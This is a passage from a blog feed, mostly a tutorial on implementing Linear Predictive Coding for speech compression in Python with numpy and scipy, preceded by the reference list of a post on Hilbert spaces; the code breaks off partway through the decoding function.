freely available on the internet !</p> <h2 id="references">References</h2> <ul> <li>[<a href="https://en.wikipedia.org/wiki/Hilbert_space">1</a>] Hilbert space - Wikipedia</li> <li>[<a href="https://people.math.osu.edu/costin.10/602/Hilbert%20Spaces.pdf">2</a>] An Introduction To Hilbert Spaces, Costin.</li> <li>[<a href="https://en.wikipedia.org/wiki/Closed_set">3</a>] Closed set - Wikipedia</li> <li>[<a href="https://en.wikipedia.org/wiki/Closure_(topology)">4</a>] Closure (topology) - Wikipedia</li> <li>[<a href="https://en.wikipedia.org/wiki/Dense_set">5</a>] Dense set - Wikipedia</li> <li>[<a href="https://www.amazon.com/gp/product/B01FEKRY4A/">6</a>] Signal Processing for Communications, Prandoni and Vetterli.</li> </ul>Guilherme KunigamiIn this post we’ll study the Hilbert space, a special type of vector space that is often used as a tool in the study of partial differential equations, quantum mechanics, Fourier analysis .Linear Predictive Coding in Python2021-05-13T00:00:00+00:002021-05-13T00:00:00+00:00https://www.kuniga.me/blog/2021/05/13/lpc-in-python<!-- This needs to be define as included html because variables are not inherited by Jekyll pages --> <p>Linear Predictive Coding (LPC) is a method for estimating the coefficients of a Source-Filter model (post) from a given data.</p> <p>The input consists of a time-series representing amplitudes of speech collected at fixed intervals over a period of time.</p> <p>The output is a matrix of coefficients corresponding to the source and filter model and is much more compact, so this method can be used for compressing audio.</p> <p>In this post we’ll study the encoding of a audio signal using LPC, which can achieve 15x compression. We’ll then decode it into a very noisy but intelligible speech.</p> <!--more--> <p>This study is largely based on Kim’s excellent <a href="https://ccrma.stanford.edu/~hskim08/lpc/">article</a>, which also provides the code in Matlab.</p> <p>The contribution of this post will be:</p> <ul> <li>Use Python instead of Matlab. Reason: Matlab is not free - I know of Octave and used it for this post to understand differences between Python and Matlab APIs, but I also wanted to learn about the Python libraries.</li> <li>Start from the code and provide the theory behind it. Reason: As someone not familiar with signal processing, I found it non-trivial to go from the theory to the code, so I’m hoping this approach can be useful.</li> </ul> <h2 id="audio-processing">Audio Processing</h2> <p>In this section we’ll read the input signal from a file and pre-process it to a suitable format.</p> <h3 id="digital-audio">Digital Audio</h3> <p>Audio is a physical, analog phenomena which must be represented digitally (discrete) in a computer.</p> <p>To convert an analog signal to a digital one, we need to obtain discrete samples. We usually work with <strong>sample rate</strong>, the number of samples per second which is given in Hertz. If we have too few samples, we’ll not correctly represent the signal. If we have too many, we’ll end up using more storage than needed. As an example, the sample rate of CD-quality audio is 44.1 kHz, that is, 44,100 samples per second.</p> <h3 id="audio-format-vs-file-format">Audio Format vs File Format</h3> <p>These terminologies can be confusing since they’re often used interchangeably. File formats are the user facing ones, for example WAV (<em>Waveform Audio File Format</em>) and MP3 (<em>MPEG-2 Audio Layer III</em>). They have an associated file extension, for example <code class="language-plaintext highlighter-rouge">.wav</code> and <code class="language-plaintext highlighter-rouge">.mp3</code>.</p> <p>The audio format is associated to how audio data is represented (encoded) in a file. We have PCM (<em>Pulse-code modulation</em>) which is how WAV encodes its data, and MP3 which is both an audio and file format.</p> <p>Some file formats can work with multiple audio formats, for example the MP4 file format, which supports audio formats like ALS, MP3 and many others.</p> <p>To make it more clear, when we’re referring to file formats we’ll use the extension (<code class="language-plaintext highlighter-rouge">.mp3</code>).</p> <h3 id="reading-wav-file">Reading .wav file</h3> <p>We’re ready for our very first task: read a <code class="language-plaintext highlighter-rouge">.wav</code> file to memory. We can use the scipy library:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">scipy.io.wavfile</span> <span class="p">...</span> <span class="p">[</span><span class="n">sample_rate</span><span class="p">,</span> <span class="n">pcm_data</span><span class="p">]</span> <span class="o">=</span> <span class="n">scipy</span><span class="p">.</span><span class="n">io</span><span class="p">.</span><span class="n">wavfile</span><span class="p">.</span><span class="n">read</span><span class="p">(</span><span class="s">'lpc/audio/speech.wav'</span><span class="p">)</span></code></pre></figure> <p>The <code class="language-plaintext highlighter-rouge">read()</code> function returns the sample rate in which the file is encoded and the data itself. For this post we’ll assume our audio has a single channel so that <code class="language-plaintext highlighter-rouge">pcm_data</code> is simply an array containing the amplitude of each samples.</p> <h3 id="numpy-arrays">Numpy Arrays</h3> <p>We’ll be using numpy a lot for matrix operations, so it’s better to work with numpy data structures all times, hence the <code class="language-plaintext highlighter-rouge">np.array()</code> conversion.</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">numpy</span> <span class="k">as</span> <span class="n">np</span> <span class="n">amplitudes</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">array</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">)</span></code></pre></figure> <p><strong>Dimensions.</strong> One of the critical parts of working with numpy arrays is understanding its dimensions. Numpy arrays are multi-dimensional, which can be inspected via the <code class="language-plaintext highlighter-rouge">shape</code> attribute. Some examples:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="c1"># 10 x 10 matrix </span><span class="n">m</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">empty</span><span class="p">(</span><span class="n">shape</span><span class="o">=</span><span class="p">(</span><span class="mi">10</span><span class="p">,</span> <span class="mi">20</span><span class="p">))</span> <span class="k">print</span><span class="p">(</span><span class="n">m</span><span class="p">.</span><span class="n">shape</span><span class="p">)</span> <span class="c1"># (10, 20) # vector of size 10 </span><span class="n">v</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">empty</span><span class="p">(</span><span class="n">shape</span><span class="o">=</span><span class="mi">10</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="n">v</span><span class="p">.</span><span class="n">shape</span><span class="p">)</span> <span class="c1"># (10, ) # 10 x 1 matrix </span><span class="n">m</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">empty</span><span class="p">(</span><span class="n">shape</span><span class="o">=</span><span class="p">(</span><span class="mi">10</span><span class="p">,</span> <span class="mi">1</span><span class="p">))</span> <span class="k">print</span><span class="p">(</span><span class="n">m</span><span class="p">.</span><span class="n">shape</span><span class="p">)</span> <span class="c1"># (10, 1)</span></code></pre></figure> <p>Note the difference between the 1 dimensional vector <code class="language-plaintext highlighter-rouge">(10, )</code> and the 2 dimensional matrix with one column <code class="language-plaintext highlighter-rouge">(10, 1)</code>.</p> <p>Let’s inspect our <code class="language-plaintext highlighter-rouge">amplitudes</code>:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">print</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">.</span><span class="n">shape</span><span class="p">)</span> <span class="c1"># (530576, )</span></code></pre></figure> <p>which shows it’s a vector with ~500k elements.</p> <h3 id="normalizing-amplitude">Normalizing Amplitude</h3> <p>We want to work with amplitudes within [-1.0, 1.0] so it’s easier to visualize and compare signals.</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">amplitudes</span> <span class="o">=</span> <span class="mf">0.9</span><span class="o">*</span><span class="n">amplitudes</span><span class="o">/</span><span class="nb">max</span><span class="p">(</span><span class="nb">abs</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">))</span></code></pre></figure> <p>Numpy arrays work with list functions like <code class="language-plaintext highlighter-rouge">max()</code> and <code class="language-plaintext highlighter-rouge">abs()</code>. It also differs from regular list in operators like <code class="language-plaintext highlighter-rouge">*</code> and <code class="language-plaintext highlighter-rouge">/</code>, where it performs the operation element-wise:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="c1"># Python list </span><span class="p">[</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">]</span><span class="o">*</span><span class="mi">3</span> <span class="c1"># [1, 2, 1, 2, 1, 2] </span> <span class="c1"># Numpy array </span><span class="n">np</span><span class="p">.</span><span class="n">array</span><span class="p">([</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">])</span><span class="o">*</span><span class="mi">3</span> <span class="c1"># np.array([3, 6])</span></code></pre></figure> <p>A tricky aspect of numpy functions is understanding when there are changes in dimensions. We can do a careful inspection of the operations:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">s1</span> <span class="o">=</span> <span class="n">amplitudes</span> <span class="c1"># original array (N, ) </span><span class="n">s2</span> <span class="o">=</span> <span class="nb">abs</span><span class="p">(</span><span class="n">s1</span><span class="p">)</span> <span class="c1"># preserves dimension (N, ) </span><span class="n">s3</span> <span class="o">=</span> <span class="nb">max</span><span class="p">(</span><span class="n">s2</span><span class="p">)</span> <span class="c1"># scalar </span><span class="n">s4</span> <span class="o">=</span> <span class="mf">0.9</span><span class="o">*</span><span class="n">s1</span> <span class="c1"># preserves dimension (N, ) </span><span class="n">s5</span> <span class="o">=</span> <span class="n">s4</span> <span class="o">/</span> <span class="n">s3</span> <span class="c1"># preserves dimension (N, )</span></code></pre></figure> <h3 id="downsampling">Downsampling</h3> <p>We can display the sample rate from the audio file:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">print</span><span class="p">(</span><span class="n">sample_rate</span><span class="p">)</span> <span class="c1"># 44100</span></code></pre></figure> <p>which is the common 44.1 kHz. We want to downsample is to 8 kHz. The article doesn’t explain exactly why but it seems like 8 kHz is enough granularity to represent the frequency range of human speech . More importantly, lower sample rates generates less samples which makes the model smaller.</p> <p>The <code class="language-plaintext highlighter-rouge">scipy.signal.resample()</code> function requires the original samples and the number of desired output samples. In Matlab’s <code class="language-plaintext highlighter-rouge">resample()</code> it takes instead the original sample rate and target sample rate, which is more convenient, but we can do the math:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">from</span> <span class="nn">scipy.signal</span> <span class="kn">import</span> <span class="n">resample</span> <span class="n">target_sample_rate</span> <span class="o">=</span> <span class="mi">8000</span> <span class="n">target_size</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">)</span><span class="o">*</span><span class="n">target_sample_rate</span><span class="o">/</span><span class="n">sample_rate</span><span class="p">)</span> <span class="n">amplitudes</span> <span class="o">=</span> <span class="n">resample</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">,</span> <span class="n">target_size</span><span class="p">)</span> <span class="n">sample_rate</span> <span class="o">=</span> <span class="n">target_sample_rate</span></code></pre></figure> <h2 id="divide-and-conquer">Divide and Conquer</h2> <p>As we saw in the <a href="https://www.kuniga.me/blog/2021/04/03/source-filter-model.html">Source-Filter Model post</a>, it can be used to represent a single constant sound like the phoneme <code class="language-plaintext highlighter-rouge">/a/</code>.</p> <p>To represent a full speech, we’ll need to chunk the samples in small blocks such that within each block there is a single phoneme being voiced.</p> <p>Note that it doesn’t matter if we end up splitting a single phoneme into multiple blocks, but we probably don’t want to use too small of a block because it makes the model bigger.</p> <h3 id="overlap-add-method-ola">Overlap-Add Method (OLA)</h3> <p>If we split our signal into disjoint windows and solve them individually, when we try to decode and reconstruct the signal we might end up with abrupt transitions, say when model at block$i$is <code class="language-plaintext highlighter-rouge">/a/</code> and$i+1$is <code class="language-plaintext highlighter-rouge">/o/</code>, it will not capture the smooth transition that happens in reality when we change our mouth when voicing <code class="language-plaintext highlighter-rouge">/a/</code> followed by <code class="language-plaintext highlighter-rouge">/o/</code>.</p> <p>To account for this, we split the signal into overlapping blocks. We also use a weight function that benefits samples in the middle of the block, because the ones at the extremities will overlap into the neighboring blocks.</p> <p>Let$x$be our input signal (i.e. an array of samples) and$n$its size. Let our window function be represented by an array of weights$w$, and$n_w$its size.</p> <p>The first block of our signal would be$B_1 = (x_1, \cdots, x_{n_w})$. Applying the weight function is simply doing a element-wise multiplication:$\hat B_1 = (x_1 w_1, \cdots, x_{n_w} w_{n_w})$.</p> <p>Let$R \in [0, 1.0]$the overlap ratio, 0 meaning no overlap, 1.0 is 100% overlap. We can find out where the next block starts by computing the step$\Delta$:</p> $\Delta = n_w (1 - R)$ <p>To see why, suppose our current block offset is$i$. If there’s no overlap, the next block offset is$i + n_w$, but when there’s$R$overlap, we need to include that much in the next block, so our next offset is reduced accordingly to$i + n_w - R n_w$.</p> <p>So for our second weighed block we’d have:$\hat B_2 = (x_{1 + \Delta} w_1, \cdots, x_{n_w + \Delta} w_{n_w})$.</p> <p>We can generalize for the$m$-th weighed block:</p> $\hat B_j = (x_{1 + (j - 1) \Delta} w_1, \cdots, x_{n_w + (j - 1) \Delta} w_{n_w})$ <p><em>Figure 1</em> shows a visualization of a signal and 4 consecutive overlapping windows. Note how the amplitude at the extremities of the windows are atenuated compared to the original signal.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-05-13-lpc-in-python/ola.png" alt="5 line charts, the first showing the full signal, the others windows from it" /> <figcaption>Figure 1: Signal and overlapping windows.</figcaption> </figure> <p>How many blocks$n_b$do we have? The index of the last sample in the last block$n_b$is denoted by$n_w + (n_b - 1) \Delta$, which might not coincide with the last sample in the original signal. We can either pad the end of the signal with 0s or truncate the last sample of the signal. If we do the latter, then we’ll get:</p> $n_b = \lfloor \frac{n - n_w}{\Delta} \rfloor + 1$ <p>We can implement these ideas in Python, remembering that we use 0-index arrays:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">create_overlapping_blocks</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">w</span><span class="p">,</span> <span class="n">R</span> <span class="o">=</span> <span class="mf">0.5</span><span class="p">):</span> <span class="n">n</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="n">nw</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">w</span><span class="p">)</span> <span class="n">step</span> <span class="o">=</span> <span class="n">floor</span><span class="p">(</span><span class="n">nw</span> <span class="o">*</span> <span class="p">(</span><span class="mi">1</span> <span class="o">-</span> <span class="n">R</span><span class="p">))</span> <span class="n">nb</span> <span class="o">=</span> <span class="n">floor</span><span class="p">((</span><span class="n">n</span> <span class="o">-</span> <span class="n">nw</span><span class="p">)</span> <span class="o">/</span> <span class="n">step</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span> <span class="n">B</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">zeros</span><span class="p">((</span><span class="n">nb</span><span class="p">,</span> <span class="n">nw</span><span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">nb</span><span class="p">):</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">i</span> <span class="o">*</span> <span class="n">step</span> <span class="n">B</span><span class="p">[</span><span class="n">i</span><span class="p">,</span> <span class="p">:]</span> <span class="o">=</span> <span class="n">w</span> <span class="o">*</span> <span class="n">x</span><span class="p">[</span><span class="n">offset</span> <span class="p">:</span> <span class="n">nw</span> <span class="o">+</span> <span class="n">offset</span><span class="p">]</span> <span class="k">return</span> <span class="n">B</span></code></pre></figure> <p>A given index$i$from the input signal will show up in one or more blocks, and in each of them it will be multiplied by the corresponding weight. More precisely, if it belongs to block$j$, the weight$x_i$was multiplied by is$w_{i - (j - 1) \Delta}$.</p> <p>Let$S_i$be the set of all block indices to which index$i$belongs. The sum the weighted$x_i$across all blocks it belongs is given by:</p> $\sum_{j \in S_i} x_i w_{i - (j - 1) \Delta} = x_i \sum_{j \in S_i} w_{i - (j - 1) \Delta}$ <p>If we choose our weight function$w$such that</p> $\sum_{j \in S_i} w_{i - (j - 1) \Delta} = 1 \qquad \forall i$ <p>Then we can recover the original signal from the invidual blocks by adding the right indices, which is the <em>Add</em> part of <em>Overlap-Add</em>.</p> <p>We can write a function to perform this:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">add_overlapping_blocks</span><span class="p">(</span><span class="n">B</span><span class="p">,</span> <span class="n">w</span><span class="p">,</span> <span class="n">R</span> <span class="o">=</span> <span class="mf">0.5</span><span class="p">):</span> <span class="p">[</span><span class="n">count</span><span class="p">,</span> <span class="n">nw</span><span class="p">]</span> <span class="o">=</span> <span class="n">X</span><span class="p">.</span><span class="n">shape</span> <span class="n">step</span> <span class="o">=</span> <span class="n">floor</span><span class="p">(</span><span class="n">nw</span> <span class="o">*</span> <span class="n">R</span><span class="p">)</span> <span class="n">n</span> <span class="o">=</span> <span class="p">(</span><span class="n">count</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="n">step</span> <span class="o">+</span> <span class="n">nw</span> <span class="n">x</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">zeros</span><span class="p">((</span><span class="n">n</span><span class="p">,</span> <span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">count</span><span class="p">):</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">i</span> <span class="o">*</span> <span class="n">step</span> <span class="n">x</span><span class="p">[</span><span class="n">offset</span> <span class="p">:</span> <span class="n">nw</span> <span class="o">+</span> <span class="n">offset</span><span class="p">]</span> <span class="o">+=</span> <span class="n">B</span><span class="p">[</span><span class="n">i</span><span class="p">,</span> <span class="p">:]</span> <span class="k">return</span> <span class="n">x</span></code></pre></figure> <h3 id="hann-window">Hann Window</h3> <p>The <a href="https://en.wikipedia.org/wiki/Hann_function">Hann window</a>, also known as raised cosine window is a function that satisfies the properties we described above. <a href="https://en.wikipedia.org/wiki/Window_function#Comparison_of_windows">Wikipedia</a> offers some insight into the choice of a Hann function :</p> <blockquote> <p>In between the extremes are moderate windows, such as Hamming and Hann. They are commonly used in narrowband applications, such as the spectrum of a telephone channel.</p> </blockquote> <p>It’s available in <code class="language-plaintext highlighter-rouge">scipy.signal</code>. The first parameter is the size of the window in number of points, which will determine the size of the blocks as we saw above. The author in  uses a window corresponding to 30ms.</p> <p>The second parameter is whether the window is <em>symmetric</em> (that is the weights form a “palindrome”) or <em>periodic</em>. The periodic window of size$n$is the same as the symmetric of size$n + 1$without the last point: <code class="language-plaintext highlighter-rouge">hann(n, False) == hann(n + 1, True)[:-1]</code>.</p> <p>I don’t understand the details, but a periodic window seems to work better when working with spectral analysis of the signal , which is what we’ll be doing by inferring the frequency of the resonance filter.</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">from</span> <span class="nn">scipy.signal.windows</span> <span class="kn">import</span> <span class="n">hann</span> <span class="n">sym</span> <span class="o">=</span> <span class="bp">False</span> <span class="c1"># periodic </span><span class="n">hann</span><span class="p">(</span><span class="n">floor</span><span class="p">(</span><span class="mf">0.03</span> <span class="o">*</span> <span class="n">sample_rate</span><span class="p">),</span> <span class="n">sym</span><span class="p">)</span> <span class="c1"># 30ms window</span></code></pre></figure> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-05-13-lpc-in-python/hann.png" alt="Line chart with the weights of the Hann windown function for n=240." /> <figcaption>Figure 2: Hann Window weights for n=240.</figcaption> </figure> <h2 id="encoding">Encoding</h2> <p>We’ve seen how to massage the signal and break it into small chunks. Now we’ll see how to infer the coefficients from any given chunk using the source-filter model.</p> <h3 id="the-lpc-model">The LPC Model</h3> <p>Let$x_t$be the amplitude of our signal at a given instant$t$. According to the source-filter model, it’s generated by a source signal$e$going through a resonant filter$h$.</p> $x_t = (h * e)_t$ <p>The$*$denotes the convolution operator. The model further assumes that the current signal also depends on the past$p$samples, that is$x_{t-1}, \cdots, x_{t-p}$, and that the source is constant, so effectively:</p> $x_t = \sum_{k=1}^{p} a_k x_{t - k} + e_t$ <h3 id="solving-the-model">Solving the model</h3> <p>We then have$n - 1$equations (one for each sample, except the first), and we have to determine the$p$coefficients$\boldsymbol a = [a_1, \cdots, a_p]^T$and$\boldsymbol e = [e_2, \cdots, e_n]:</p> \begin{align} x_1 a_1 &amp; &amp; + \, e_2 &amp;= x_2\\ x_2 a_1 &amp; + x_1 a_2 &amp; + \, e_3 &amp;= x_3\\ \vdots &amp; \\ x_p a_1 &amp; + x_{p - 1} a_2 + \cdots + x_{1} a_p &amp; + \, e_{p+1} &amp;= x_{p + 1}\\ \vdots &amp; \\ x_{n - 1} a_1 &amp; + x_{n - 1} a_2 + \cdots + x_{n - p} a_p &amp; + \, e_n &amp;= x_n\\ \end{align} <p>The approach taken in  is to ignore the errors and solve for\boldsymbol a$, but trying to minimize the error. The error is then$\boldsymbol e$.</p> <p>More precisely, we define the matrix$X$where the$i$-th row is:</p> $X_i = [x_i, x_{i - 1}, \cdots, x_{i - p + 1}]$ <p>We assume that$x_i = 0$if$i &lt;= 0$. We define$b$as the column vector:$[x_1, \cdots, x_n]^T$, and then w solve the linear system:$X \boldsymbol a = b$for$\boldsymbol a$, minimizing the square of the error.</p> <p>One way of constructing the matrix$X$is to generate a vector$[x_n, x_{n-1}, \cdots, x_1, 0, \cdots, 0]$and then assign the last$p$entries to the first row ($[x_1, 0, \cdots, 0]$), then shift the window by one and assign to the second row ($[x_2, x_1, 0, \cdots, 0]$), and so on.</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">make_matrix_X</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">p</span><span class="p">):</span> <span class="n">n</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="c1"># [x_n, ..., x_1, 0, ..., 0] </span> <span class="n">xz</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">concatenate</span><span class="p">([</span><span class="n">x</span><span class="p">[::</span><span class="o">-</span><span class="mi">1</span><span class="p">],</span> <span class="n">np</span><span class="p">.</span><span class="n">zeros</span><span class="p">(</span><span class="n">p</span><span class="p">)])</span> <span class="n">X</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">zeros</span><span class="p">((</span><span class="n">n</span> <span class="o">-</span> <span class="mi">1</span><span class="p">,</span> <span class="n">p</span><span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">n</span> <span class="o">-</span> <span class="mi">1</span><span class="p">):</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">n</span> <span class="o">-</span> <span class="mi">1</span> <span class="o">-</span> <span class="n">i</span> <span class="n">X</span><span class="p">[</span><span class="n">i</span><span class="p">,</span> <span class="p">:]</span> <span class="o">=</span> <span class="n">xz</span><span class="p">[</span><span class="n">offset</span> <span class="p">:</span> <span class="n">offset</span> <span class="o">+</span> <span class="n">p</span><span class="p">]</span> <span class="k">return</span> <span class="n">X</span></code></pre></figure> <p>We can then use <code class="language-plaintext highlighter-rouge">np.linalg.lstsq()</code> to solve and find <code class="language-plaintext highlighter-rouge">a</code>:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">solve_lpc</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">p</span><span class="p">,</span> <span class="n">ii</span><span class="p">):</span> <span class="n">b</span> <span class="o">=</span> <span class="n">x</span><span class="p">[</span><span class="mi">1</span><span class="p">:]</span> <span class="n">X</span> <span class="o">=</span> <span class="n">make_matrix_X</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> <span class="n">a</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">linalg</span><span class="p">.</span><span class="n">lstsq</span><span class="p">(</span><span class="n">X</span><span class="p">,</span> <span class="n">b</span><span class="p">.</span><span class="n">T</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="n">e</span> <span class="o">=</span> <span class="n">b</span> <span class="o">-</span> <span class="n">np</span><span class="p">.</span><span class="n">dot</span><span class="p">(</span><span class="n">X</span><span class="p">,</span> <span class="n">a</span><span class="p">)</span> <span class="n">g</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">var</span><span class="p">(</span><span class="n">e</span><span class="p">)</span> <span class="k">return</span> <span class="p">[</span><span class="n">a</span><span class="p">,</span> <span class="n">g</span><span class="p">]</span></code></pre></figure> <p>The vector <code class="language-plaintext highlighter-rouge">e</code> is assumed to be samples from a white noise source. This can be modeled by a normal distribution with zero mean and the same variance$g = \sigma^2$, so this is the only parameter we need to store in our model.</p> <h3 id="encoding-the-whole-signal">Encoding the Whole Signal</h3> <p>We can now define the LPC algorithm, by first splitting the original signal into chunks then solving the model for each chunk:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">lpc_encode</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">p</span><span class="p">,</span> <span class="n">w</span><span class="p">):</span> <span class="n">B</span> <span class="o">=</span> <span class="n">create_overlapping_blocks</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">w</span><span class="p">)</span> <span class="p">[</span><span class="n">nb</span><span class="p">,</span> <span class="n">nw</span><span class="p">]</span> <span class="o">=</span> <span class="n">B</span><span class="p">.</span><span class="n">shape</span> <span class="n">A</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">zeros</span><span class="p">((</span><span class="n">p</span><span class="p">,</span> <span class="n">nb</span><span class="p">))</span> <span class="n">G</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">zeros</span><span class="p">((</span><span class="mi">1</span><span class="p">,</span> <span class="n">nb</span><span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">nb</span><span class="p">):</span> <span class="p">[</span><span class="n">a</span><span class="p">,</span> <span class="n">g</span><span class="p">]</span> <span class="o">=</span> <span class="n">solve_lpc</span><span class="p">(</span><span class="n">B</span><span class="p">[</span><span class="n">i</span><span class="p">,</span> <span class="p">:],</span> <span class="n">p</span><span class="p">,</span> <span class="n">i</span><span class="p">)</span> <span class="n">A</span><span class="p">[:,</span> <span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">a</span> <span class="n">G</span><span class="p">[:,</span> <span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">g</span> <span class="k">return</span> <span class="p">[</span><span class="n">A</span><span class="p">,</span> <span class="n">G</span><span class="p">]</span></code></pre></figure> <h2 id="decoding">Decoding</h2> <p>Let’s look at recovering the signal from the coefficients obtained for any given chunk.</p> <h3 id="simulating-a-source-filter-model">Simulating a Source-Filter Model</h3> <p>Decoding a LPC model consists in simulating a Source-Filter model: we first generate a source signal (white noise) and then apply a filter corresponding to the coefficients.</p> <p>For the white noise, we get samples from a normal distribution. The function <code class="language-plaintext highlighter-rouge">randn()</code> implements a normal distribution with mean 0 and variance 1. To get a variance of <code class="language-plaintext highlighter-rouge">g</code>, we need to multiply by$\sqrt{g}$, since</p> $\mathcal{N}(\mu, \sigma^2) = \mathcal{N}(0, 1) \cdot \sigma + \mu$ <p>I don’t know anything about digital filters (EDIT: this makes a lot more sense after <a href="https://www.kuniga.me/blog/2021/09/11/z-transform.html">Z-transform</a>) but for now we can assume <code class="language-plaintext highlighter-rouge">lfilter()</code> is filtering a source signal (third argument) and amplifying certain frequencies specified by the coefficients in <code class="language-plaintext highlighter-rouge">a</code> (second argument).</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">run_source_filter</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">g</span><span class="p">,</span> <span class="n">block_size</span><span class="p">):</span> <span class="n">src</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">sqrt</span><span class="p">(</span><span class="n">g</span><span class="p">)</span><span class="o">*</span><span class="n">randn</span><span class="p">(</span><span class="n">block_size</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="c1"># noise </span> <span class="n">b</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">concatenate</span><span class="p">([</span><span class="n">np</span><span class="p">.</span><span class="n">array</span><span class="p">([</span><span class="o">-</span><span class="mi">1</span><span class="p">]),</span> <span class="n">a</span><span class="p">])</span> <span class="n">x_hat</span> <span class="o">=</span> <span class="n">lfilter</span><span class="p">([</span><span class="mi">1</span><span class="p">],</span> <span class="n">b</span><span class="p">.</span><span class="n">T</span><span class="p">,</span> <span class="n">src</span><span class="p">.</span><span class="n">T</span><span class="p">).</span><span class="n">T</span> <span class="c1"># convert Nx1 matrix into a N vector </span> <span class="k">return</span> <span class="n">np</span><span class="p">.</span><span class="n">squeeze</span><span class="p">(</span><span class="n">x_hat</span><span class="p">)</span></code></pre></figure> <h3 id="decoding-the-whole-signal">Decoding the Whole Signal</h3> <p>Now that we can decode the signal from a given single LPC model, we can generate all OLA blocks ($\hat B$) and add them back up to obtain the full signal ($\hat x$):</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">lpc_decode</span><span class="p">(</span><span class="n">A</span><span class="p">,</span> <span class="n">G</span><span class="p">,</span> <span class="n">w</span><span class="p">,</span> <span class="n">lowcut</span> <span class="o">=</span> <span class="mi">0</span><span class="p">):</span> <span class="p">[</span><span class="n">ne</span><span class="p">,</span> <span class="n">n</span><span class="p">]</span> <span class="o">=</span> <span class="n">G</span><span class="p">.</span><span class="n">shape</span> <span class="n">nw</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">w</span><span class="p">)</span> <span class="p">[</span><span class="n">p</span><span class="p">,</span> <span class="n">_</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">.</span><span class="n">shape</span> <span class="n">B_hat</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">zeros</span><span class="p">((</span><span class="n">n</span><span class="p">,</span> <span class="n">nw</span><span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">n</span><span 